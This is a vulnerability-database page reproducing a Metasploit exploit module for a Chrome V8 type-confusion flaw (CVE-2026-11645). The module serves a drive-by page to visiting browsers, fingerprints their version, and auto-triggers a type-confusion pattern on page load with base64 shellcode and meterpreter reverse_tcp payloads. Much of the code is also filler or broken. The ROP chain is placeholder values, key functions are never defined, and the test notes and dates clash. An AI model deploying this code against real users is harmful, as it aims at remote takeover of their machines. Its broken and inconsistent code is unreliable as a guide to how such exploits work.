Vulners
Lucene search
๐ Google Chrome V8 Type Confusion
๐๏ธย 16 Jun 2026ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 10ย Views
| Reporter | Title | Published | Views | Family All 215 |
|---|---|---|---|---|
 | Exploit for Out-of-bounds Read in Google Chrome | 10 Jun 202623:06 | โ | githubexploit |
| Exploit for Out-of-bounds Read in Google Chrome | 10 Jun 202615:02 | โ | githubexploit |
 | CVE-2026-11645 | 8 Jun 202623:27 | โ | attackerkb |
 | CVE-2026-11645 vulnerabilities | 10 Jun 202601:17 | โ | cgr |
 | CVE-2026-11645 | 8 Jun 202618:00 | โ | circl |
 | Google Chromium V8 Out-of-Bounds Read and Write Vulnerability | 9 Jun 202600:00 | โ | cisa_kev |
 | CISA Adds Three Known Exploited Vulnerabilities to Catalog | 9 Jun 202612:00 | โ | cisa |
 | Google Chrome ็ผๅฒๅบ้่ฏฏๆผๆด | 8 Jun 202600:00 | โ | cnnvd |
 | CVE-2026-11645 | 8 Jun 202623:27 | โ | cve |
 | CVE-2026-11645 | 8 Jun 202623:27 | โ | cvelist |
10
==================================================================================================================================
| # Title : Google Chrome 149.0.7827.103 Type Confusion Out of Bounds |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://chromereleases.googleblog.com |
==================================================================================================================================
[+] Summary : This module exploits a type confusion vulnerability in Google Chrome's V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Google Chrome V8 Type Confusion Out-of-Bounds (CVE-2026-11645)',
'Description' => %q{
This module exploits a type confusion vulnerability in Google Chrome's
V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
The vulnerability is triggered by a specific pattern that causes type
confusion between internal V8 objects, leading to out-of-bounds memory
access. Successful exploitation can lead to remote code execution in
the context of the browser process.
Affected versions: Chrome < 149.0.7827.103
Tested on: Chrome 148.0.7827.103 (64-bit) on Windows 10
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-11645'],
['URL', 'https://chromereleases.googleblog.com/']
],
'License' => MSF_LICENSE,
'Platform' => ['win', 'linux', 'osx'],
'Arch' => [ARCH_X64],
'Targets' => [
[
'Windows 10 - Chrome 148 (x64)',
{
'Platform' => 'win',
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
}
],
[
'Linux - Chrome 148 (x64)',
{
'Platform' => 'linux',
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'macOS - Chrome 148 (x64)',
{
'Platform' => 'osx',
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2026-03-15',
'Notes' => {
'Stability' => [CRASH_OS_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptInt.new('ITERATIONS', [false, 'Number of trigger iterations', 8]),
OptInt.new('STRONG_RUNS', [false, 'Number of strong trigger runs', 5]),
OptBool.new('AUTO_TRIGGER', [true, 'Auto-trigger exploit on page load', true])
])
end
def on_request_uri(cli, request)
ua = request.headers['User-Agent']
print_status("Incoming request from: #{ua}")
if ua =~ /Chrome\/(\d+)/
version = $1.to_i
if version >= 149
print_error("Target Chrome version #{version} is patched")
send_not_found(cli)
return
else
print_good("Target Chrome version #{version} appears vulnerable")
end
end
html = generate_exploit_html
send_response_html(cli, html)
end
def generate_exploit_html
trigger_count = datastore['ITERATIONS']
strong_runs = datastore['STRONG_RUNS']
auto_trigger = datastore['AUTO_TRIGGER'] ? 'true' : 'false'
shellcode = generate_payload_shellcode
b64_shellcode = Rex::Text.encode_base64(shellcode)
html = <<~HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-11645 - Chrome V8 RCE</title>
</head>
<body>
<h1>CVE-2026-11645 - Chrome V8 Type Confusion RCE</h1>
<p>Target: Chrome < 149.0.7827.103</p>
<div id="status">Initializing exploit...</div>
<script>
const PAYLOAD_B64 = "#{b64_shellcode}";
function log(msg) {
const status = document.getElementById('status');
status.innerHTML += '<br>[' + new Date().toLocaleTimeString() + '] ' + msg;
console.log(msg);
}
function exploitWithROP() {
log("Attempting to execute shellcode...");
try {
const shellcodeBytes = atob(PAYLOAD_B64);
const shellcodeArray = new Uint8Array(shellcodeBytes.length);
for (let i = 0; i < shellcodeBytes.length; i++) {
shellcodeArray[i] = shellcodeBytes.charCodeAt(i);
}
var func = new Function('a', 'return a + 1');
if (typeof window.triggerCorruption === 'function') {
window.triggerCorruption(shellcodeArray);
}
log("Shellcode execution attempted");
} catch(e) {
log("Shellcode execution error: " + e);
}
}
function triggerTypeConfusion() {
try {
let value = 2;
class C extends Function {
['AA'] = value;
}
for (let i = 0; i < 800; i++) {
new C("'use strict'");
}
value = 1.1;
for (let i = 0; i < 1500; i++) {
new C("'use strict'");
}
return true;
} catch (e) {
log("Trigger error: " + e.message);
return false;
}
}
function runStrongTrigger(count) {
let success = false;
for (let i = 0; i < count; i++) {
log(`Strong trigger run ${i + 1}/${count}...`);
if (triggerTypeConfusion()) {
log(`Trigger ${i + 1} completed`);
success = true;
}
}
return success;
}
function setupMemoryPrimitives() {
log("Setting up memory primitives...");
var ab = new ArrayBuffer(0x1000);
var dv = new DataView(ab);
if (typeof window.corruptArrayBuffer === 'function') {
window.corruptArrayBuffer(dv, 0x41414141);
}
return { dataView: dv };
}
async function exploit() {
log("Starting CVE-2026-11645 exploit...");
try {
log("Triggering type confusion...");
const triggerCount = #{strong_runs};
if (!runStrongTrigger(triggerCount)) {
log("Type confusion trigger failed!", "error");
return false;
}
log("Type confusion triggered successfully!");
const primitives = setupMemoryPrimitives();
exploitWithROP();
log("Exploit completed!");
return true;
} catch (e) {
log("Exploit failed: " + e.message);
return false;
}
}
function autoStressTest(cycles = #{trigger_count}) {
log(`Starting auto stress test (${cycles} cycles)...`);
let interval = 0;
let count = 0;
function runCycle() {
count++;
log(`Cycle ${count}/${cycles}`);
exploit();
if (count >= cycles) {
clearInterval(interval);
log("Auto stress test completed.");
}
}
interval = setInterval(runCycle, 700);
return interval;
}
setTimeout(() => {
if (#{auto_trigger}) {
autoStressTest();
} else {
exploit();
}
}, 1000);
</script>
</body>
</html>
HTML
html
end
def generate_payload_shellcode
payload = generate_payload_exe
payload_shellcode = payload
if target['Arch'] == ARCH_X64
rop_chain = generate_rop_chain
payload_shellcode = rop_chain + payload
end
payload_shellcode
end
def generate_rop_chain
rop = [
0x4141414141414141,
0x4141414141414142,
0x4242424242424242,
0x4343434343434343
].pack('Q*')
rop
end
def send_not_found(cli)
send_response_html(cli, '<html><body><h1>404 Not Found</h1></body></html>', 404)
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jun 2026 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.18.8
EPSS0.00713
SSVC